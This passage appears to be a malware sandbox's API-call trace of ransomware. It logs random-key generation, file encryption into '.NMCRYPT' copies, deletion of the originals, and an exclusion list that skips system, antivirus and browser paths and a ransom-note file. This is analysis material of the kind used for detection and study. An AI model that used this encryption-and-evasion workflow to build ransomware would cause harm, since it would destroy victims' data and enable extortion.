pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.086] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.086] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.086] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0155.086] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.086] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad378) returned 1 [0155.086] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.086] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.086] wcslen (_String="\\\\?\\") returned 0x4 [0155.086] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad138) returned 1 [0155.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.087] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.087] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=212) returned 1 [0155.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.088] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0xd4, lpOverlapped=0x0) returned 1 [0155.088] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xd4, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.088] GetLastError () returned 0x0 [0155.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.100] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.100] WriteFile (in: hFile=0x588, lpBuffer=0x28d4d40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0155.100] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml", dwFileAttributes=0x20) returned 0 [0155.100] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 1 [0155.100] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0 [0155.101] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" [0155.101] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.101] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD0FE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd0fe.tmp")) returned 0xd0fe [0155.101] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD0FE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd0fe.tmp"), dwFlags=0x1) returned 0 [0155.103] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD0FE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd0fe.tmp")) returned 1 [0155.103] CryptDestroyKey (hKey=0x9ad138) returned 1 [0155.103] wcslen (_String="OK") returned 0x2 [0155.103] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.103] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.103] CryptDestroyKey (hKey=0x9ad378) returned 1 [0155.103] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0155.103] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0155.103] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.103] wcscmp (_String1="insert", _String2=".") returned 1 [0155.103] wcscmp (_String1="insert", _String2="..") returned 1 [0155.103] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*NMCRYPT") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*Recovers your files.html") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.exe") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.dll") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.lnk") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.bat") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.ini") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.msi") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*.scf") returned 0 [0155.103] PathMatchSpecW (pszFile="insert.xml", pszSpec="*pagefile.sys*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*AppData*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\winrar\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\java\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\windows\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\ESET\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\AVG\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*Atheros*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*Realtek*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*bootmgr*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*boot*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*boot*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*IO.SYS*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*ntldr*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*chrome*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*opera*") returned 0 [0155.104] PathMatchSpecW (pszFile="insert.xml", pszSpec="*firefox*") returned 0 [0155.104] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml", pszSpec="*") returned 1 [0155.104] strlen (_Str="NMoreira") returned 0x8 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 